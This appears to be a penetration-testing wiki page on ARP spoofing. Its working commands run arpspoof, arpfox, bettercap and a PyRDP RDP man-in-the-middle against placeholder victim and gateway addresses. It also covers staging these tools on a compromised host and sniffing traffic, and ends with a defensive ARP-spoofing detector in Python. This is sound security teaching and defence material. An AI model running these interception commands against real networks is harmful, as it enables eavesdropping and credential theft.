# ARP Spoofing

* <https://idafchev.github.io/pentest/2019/10/28/combining_arp_poisoning_and_ip_spoofing_to_bypass_firewalls.html>
* <https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/arp-poisoning>

Enable IP forwarding:

```
$ sudo sysctl -w net.ipv4.ip_forward=1
# alternative:
$ sudo sh -c 'echo 1 > /proc/sys/net/ipv4/ip_forward'
# to make it permanent, add "net.ipv4.ip_forward = 1" to /etc/sysctl.conf
```

## arpspoof (dsniff)

* <https://github.com/tecknicaltom/dsniff>
* <https://github.com/GregHoff/dsniff>

Install:

```
$ sudo apt install dsniff -y
```

Fire up the attack with Wireshark (filter `ip.src == VICTIM_10.0.0.5`) running:

```
$ sudo arpspoof [-i eth0] [-c both] -t VICTIM_10.0.0.5 GATEWAY_10.0.0.1 [-r]
```

![arpspoof Output Disassembled](/files/-Mh5ORfBVC--x9HJbCJ8)

{% hint style="info" %}
Wireshark filter while ARP spoofing:

```
(http || ftp || smb || smb2 || ldap) && ip.src == VICTIM_10.0.0.5
```

{% endhint %}

For Windows: [alandau/arpspoof](https://github.com/alandau/arpspoof/releases)

### Portable

* <https://github.com/byt3bl33d3r/arpspoof>
* <https://github.com/malfunkt/arpfox>

As a portable alternative one may use the Python port of arpspoof compiled with PyInstaller:

```
$ sudo apt install virtualenv
$ pip install pyinstaller==3.5
$ git clone https://github.com/byt3bl33d3r/arpspoof
$ cd arpspoof
$ virtualenv -p `which python2` venv
$ . venv/bin/activate
$ pip install -r requirements.txt
$ pyinstaller --onefile --paths venv/lib/python2.7/site-packages arpspoof/arpspoof.py
$ file dist/arpspoof
```

Another approach is to download Python dependencies locally and install them on a compromised Linux host:

```
Dev$ pip download --no-binary=:all: -r requirements.txt
Compromised$ python -m pip install --no-index --find-links . -r requirements.txt
```

If you need to launch ARP spoofing on another distro (CentOS, for example), then installing OS dependencies and using a portable binary may be easier:

```
Dev$ mkdir /tmp/tcpdump && yum install --downloadonly --downloaddir=/tmp/tcpdump tcpdump
Dev$ ls /tmp/tcpdump
libpcap-1.5.3-12.el7.x86_64.rpm  tcpdump-4.9.2-4.el7_7.1.x86_64.rpm

Compromised$ rpm -i libpcap*.rpm tcpdump*.rpm
Compromised$ tcpdump -nvv -i eth0 -s 65535 -w arpfox.pcap "src host VICTIM_10.0.0.5"
Compromised$ ./arpfox -l
Compromised$ ./arpfox -i eth0 -t VICTIM_10.0.0.5 GATEWAY_10.0.0.1
```

## bettercap

* <https://github.com/bettercap/bettercap>
* <https://www.bettercap.org/modules/>
* <https://linuxhint.com/install-bettercap-on-ubuntu-18-04-and-use-the-events-stream/>
* <https://hackernoon.com/man-in-the-middle-attack-using-bettercap-framework-hd783wzy>
* <https://www.cyberpunk.rs/bettercap-usage-examples-overview-custom-setup-caplets>

Deb dependencies (Ubuntu 18.04 LTS):

* [libpcap0.8\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap0.8_1.8.1-6ubuntu1_amd64.deb.html)
* [libpcap0.8-dev\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap0.8-dev_1.8.1-6ubuntu1_amd64.deb.html)
* [libpcap-dev\_1.8.1-6ubuntu1\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libpcap-dev_1.8.1-6ubuntu1_amd64.deb.html)
* [pkg-config\_0.29.1-0ubuntu2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/pkg-config_0.29.1-0ubuntu2_amd64.deb.html)
* [libnetfilter-queue1\_1.0.2-2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libnetfilter-queue1_1.0.2-2_amd64.deb.html)
* [libnfnetlink-dev\_1.0.1-3\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-main-amd64/libnfnetlink-dev_1.0.1-3_amd64.deb.html)
* [libnetfilter-queue-dev\_1.0.2-2\_amd64.deb](https://ubuntu.pkgs.org/18.04/ubuntu-universe-amd64/libnetfilter-queue-dev_1.0.2-2_amd64.deb.html)

Attack:

```
$ sudo ./bettercap --iface eth0 --caplet arpspoof.cap
```

{% code title="arpspoof.cap" %}

```bash
# Quick recon of the network
net.probe on

# Set the ARP spoofing
set arp.spoof.targets $CLIENT_IP
set arp.spoof.internal false
set arp.spoof.fullduplex false

# Control logging and verbosity
events.ignore endpoint
events.ignore net.sniff

# Start the modules
arp.spoof on
net.sniff on
```

{% endcode %}

### PyRDP

* <https://github.com/GoSecure/pyrdp>
* <https://github.com/GoSecure/pyrdp/blob/master/docs/bettercap-rdp-mitm.md>
* <https://github.com/GoSecure/caplets/blob/master/rdp-proxy/rdp-sniffer.cap>

Install PyRDP:

```
$ sudo apt update
$ sudo apt install python3 python3-pip python3-dev python3-setuptools python3-venv build-essential python3-dev git openssl libgl1-mesa-glx libnotify-bin libxkbcommon-x11-0 libxcb-xinerama0 libavformat-dev libavcodec-dev libavdevice-dev libavutil-dev libswscale-dev libswresample-dev libavfilter-dev -y
$ git clone https://github.com/gosecure/pyrdp ~/tools/pyrdp && cd ~/tools/pyrdp
$ python3 -m venv venv && source venv/bin/activate
$ pip install -U pip setuptools wheel
$ pip install -U -e '.[full]'
```

Compile bettercap [from fork](https://github.com/GoSecure/bettercap):

```
$ sudo apt install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev -y
$ mkdir -p $GOPATH/src/github.com/bettercap && cd $GOPATH/src/github.com/bettercap
$ git clone https://github.com/GoSecure/bettercap -b rdp-mitm --single-branch && cd bettercap
$ go mod init && go mod tidy && go get && go mod vendor && go build
```

Run the attack, hoping that the RDP client `192.168.1.3` will connect to the RDP server `192.168.1.2` with NLA disabled:

```
$ curl -sSL https://github.com/GoSecure/caplets/raw/master/rdp-proxy/rdp-sniffer.cap -o rdp-sniffer.cap
$ pyrdp-player.py -p 3000
$ sudo ./bettercap -iface eth0 -caplet rdp-sniffer.cap -eval "set arp.spoof.targets 192.168.1.2, 192.168.1.3; set rdp.proxy.targets 192.168.1.2; set rdp.proxy.player.ip 127.0.0.1; set rdp.proxy.replay true; set rdp.proxy.command `which pyrdp-mitm.py`"
$ sudo arpspoof -i eth0 -t 192.168.1.3 192.168.1.2 -r
```

## Mitigations

Mitigating ARP spoofing:

{% file src="/files/i68gGuRjREjoNYIt8R3S" %}
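Detection is the other half of mitigation. The attacks above all work by sending ARP replies that bind the gateway's (or the victim's) IP to the attacker's MAC, typically without any preceding request. The following passive detector is an added example, not code from this page or from any of the tools listed: it parses raw Ethernet/ARP frames, keeps a table of trusted (static) IP-to-MAC bindings such as the gateway, learns dynamic bindings, and flags a frame when a trusted binding is violated, a learned MAC changes, a reply arrives that no one asked for, or the Ethernet source MAC differs from the ARP sender MAC. The frames, MACs and IPs in `detect_sequence()` are constructed test input (they replay the `VICTIM_10.0.0.5` / `GATEWAY_10.0.0.1` scenario from above), not captured traffic.

```python
"""Passive ARP-spoofing detector (added example): parse raw Ethernet/ARP frames
and report anomalies against trusted static bindings and learned dynamic ones."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def parse_arp_frame(frame: bytes):
    """Return ARP fields of an Ethernet II frame, or None if not IPv4-over-Ethernet ARP."""
    if len(frame) < 42:
        return None
    _dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": mac_str(src), "op": op, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa)}


def build_arp_frame(op, sha, spa, tha, tpa) -> bytes:
    """Build a constructed test frame (not captured traffic): Ethernet header + ARP body."""
    def mac(s): return bytes(int(x, 16) for x in s.split(":"))
    def ip(s): return bytes(int(x) for x in s.split("."))
    eth_dst = b"\xff" * 6 if op == ARP_REQUEST else mac(tha)
    eth = struct.pack("!6s6sH", eth_dst, mac(sha), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op, mac(sha), ip(spa), mac(tha), ip(tpa))
    return eth + arp


class ArpMonitor:
    """Tracks IP->MAC bindings seen on the wire and returns alerts for each frame."""

    def __init__(self, trusted):
        self.trusted = dict(trusted)  # static bindings to protect (assumed known, e.g. the gateway)
        self.seen = {}                # first-seen dynamic IP -> MAC; never overwritten on conflict
        self.pending = set()          # (requester_ip, target_ip) of outstanding requests
        self.alerts = []

    def observe(self, frame: bytes):
        arp = parse_arp_frame(frame)
        if arp is None:
            return []
        found = []
        spa, sha = arp["spa"], arp["sha"]
        if arp["eth_src"] != sha:
            found.append(f"eth-src-mismatch {arp['eth_src']} != {sha} for {spa}")
        if spa in self.trusted and self.trusted[spa] != sha:
            found.append(f"trusted-binding-violation {spa} claimed by {sha}, expected {self.trusted[spa]}")
        if spa in self.seen and self.seen[spa] != sha:
            found.append(f"mac-changed {spa}: {self.seen[spa]} -> {sha}")
        if arp["op"] == ARP_REQUEST:
            self.pending.add((spa, arp["tpa"]))
        elif arp["op"] == ARP_REPLY:
            key = (arp["tpa"], spa)  # reply should answer a request the target made for spa
            if key in self.pending:
                self.pending.discard(key)
            else:
                found.append(f"unsolicited-reply {spa} is-at {sha} sent to {arp['tpa']}")
        if spa != "0.0.0.0" and spa not in self.trusted:  # ignore ARP probes; trusted IPs are static
            self.seen.setdefault(spa, sha)
        self.alerts.extend(found)
        return found


def detect_sequence():
    """Replay a constructed request/reply exchange followed by spoofed replies; return all alerts."""
    gw_mac, victim_mac, rogue_mac = "02:00:00:00:00:01", "02:00:00:00:00:05", "02:00:00:00:00:99"
    mon = ArpMonitor(trusted={"10.0.0.1": gw_mac})
    frames = [
        build_arp_frame(ARP_REQUEST, victim_mac, "10.0.0.5", "00:00:00:00:00:00", "10.0.0.1"),  # legit
        build_arp_frame(ARP_REPLY, gw_mac, "10.0.0.1", victim_mac, "10.0.0.5"),                # legit
        build_arp_frame(ARP_REPLY, rogue_mac, "10.0.0.1", victim_mac, "10.0.0.5"),             # gateway spoofed
        build_arp_frame(ARP_REPLY, rogue_mac, "10.0.0.5", gw_mac, "10.0.0.1"),                 # victim spoofed
    ]
    for f in frames:
        mon.observe(f)
    return mon.alerts


if __name__ == "__main__":
    for alert in detect_sequence():
        print(alert)
```

The trusted table is the same information a static ARP entry or switch-side Dynamic ARP Inspection binding would hold; on a real host you would feed `observe()` from a raw socket or a pcap reader instead of the constructed frames, and forward the alerts to your SIEM rather than printing them. Learned bindings are deliberately not overwritten when they conflict, so a sustained poisoning run keeps raising `mac-changed` rather than silently being adopted as the new truth.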

